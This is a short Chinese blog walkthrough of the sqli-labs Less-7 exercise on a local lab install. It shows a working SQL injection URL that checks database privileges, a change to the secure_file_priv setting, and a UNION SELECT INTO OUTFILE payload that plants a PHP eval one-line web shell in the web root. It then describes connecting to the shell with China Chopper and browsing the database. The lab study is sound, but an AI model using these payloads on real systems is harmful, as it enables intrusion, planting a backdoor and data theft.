本文详细介绍了如何利用GET字符型注入在Less-7题目中实现文件导出。首先通过常规测试和字符闭合条件发现注入方式,然后进行数据库权限测试。接着调整数据库的secure_file_priv参数,创建并写入一句话木马,最终成功连接并获取数据库信息。
Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)
这道题首先还是常规测试:发现网页给的提醒,用Use outfile
之后测试字符闭合条件:发现字符应该是’))来闭合的
利用文件导入时还要注意对数据库进行权限测试:正确回显
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and (select count(*) from mysql.user)>0 --+
之后进行into outfile:
首先要确定你的数据库secure_file_priv 这个函数中不能有值
(详情请见https://www.cnblogs.com/jiangfeilong/p/11311896.html——secure_file_priv参数设置)
然后在my.ini下加入secure_file_priv=’’
配置完成,开始进行文件建立并写入一句话木马:
网页还是显示失败,但可以看到文件中已经写入了
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,"<?php @eval($_POST['123']);?>" into outfile"c:\\phpStudyB\\WWW\\sqli-labs-master\\Less-7\\try1.php" --+
之后用菜刀连入即可
之后,在该目录下找到所要找的数据库信息:
找到第一步的连接
转到相应的目录下,进行第二步的连接:
再进入相应的数据库即可获得
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
